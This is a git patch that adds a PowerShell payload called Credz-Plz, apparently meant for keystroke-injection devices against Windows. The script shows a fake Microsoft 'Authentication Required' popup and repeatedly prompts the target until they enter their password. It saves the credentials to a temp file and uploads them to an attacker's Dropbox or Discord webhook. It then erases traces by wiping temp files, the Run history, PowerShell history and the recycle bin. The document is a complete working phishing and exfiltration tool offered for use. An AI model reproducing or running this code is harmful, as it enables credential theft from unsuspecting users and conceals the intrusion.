From ad5f787a55b36f25cef313678efe6ca4f13f8a0c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 3 Jan 2023 20:13:41 -0600 Subject: [PATCH] Create test.ps1 --- Payloads/Flip-Credz-Plz/test.ps1 | 216 +++++++++++++++++++++++++++++++ 1 file changed, 216 insertions(+) create mode 100644 Payloads/Flip-Credz-Plz/test.ps1 diff --git a/Payloads/Flip-Credz-Plz/test.ps1 b/Payloads/Flip-Credz-Plz/test.ps1 new file mode 100644 index 0000000..680f45e --- /dev/null +++ b/Payloads/Flip-Credz-Plz/test.ps1 @@ -0,0 +1,216 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script is meant to trick your target into sharing their credentials through a fake authentication pop up message +.DESCRIPTION + A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" + This will be followed by a fake authentication ui prompt. + If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up + Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection +.Link + https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads +#> + +#------------------------------------------------------------------------------------------------------------------------------------ +# This is for if you want to host your own version of the script + +# $db = "YOUR-DROPBOX-ACCESS-TOKEN" + +# $dc = "YOUR-DISCORD-WEBHOOK" + +#------------------------------------------------------------------------------------------------------------------------------------ + +$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# +.NOTES + This is to generate the ui.prompt you will use to harvest their credentials +#> + +function Get-Creds { + +$form = $null + +while ($form -eq $null) +{ + $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password + + if ($cred.Password -eq "") + { + Write-Output "Credentials cannot be left blank. Please try again." + $cred = $null + } + + else{$creds = $cred.GetNetworkCredential() | fl + return $creds} +} +} + +#---------------------------------------------------------------------------------------------------- + +<# +.NOTES + This is to pause the script until a mouse movement is detected +#> + +function Pause-Script{ +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- + +# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off + +function Caps-Off { +Add-Type -AssemblyName System.Windows.Forms +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} +} +#---------------------------------------------------------------------------------------------------- + +<# +.NOTES + This is to call the function to pause the script until a mouse movement is detected then activate the pop-up +#> + +Pause-Script + +Caps-Off + +Add-Type -AssemblyName PresentationCore,PresentationFramework +$msgBody = "Please authenticate your Microsoft Account." +$msgTitle = "Authentication Required" +$msgButton = 'Ok' +$msgImage = 'Warning' +$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) +Write-Host "The user clicked: $Result" + +$creds = Get-Creds + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# +.NOTES + This is to save the gathered credentials to a file in the temp directory +#> + +echo $creds >> $env:TMP\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# +.NOTES + This is to upload your files to dropbox +#> + +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + +exit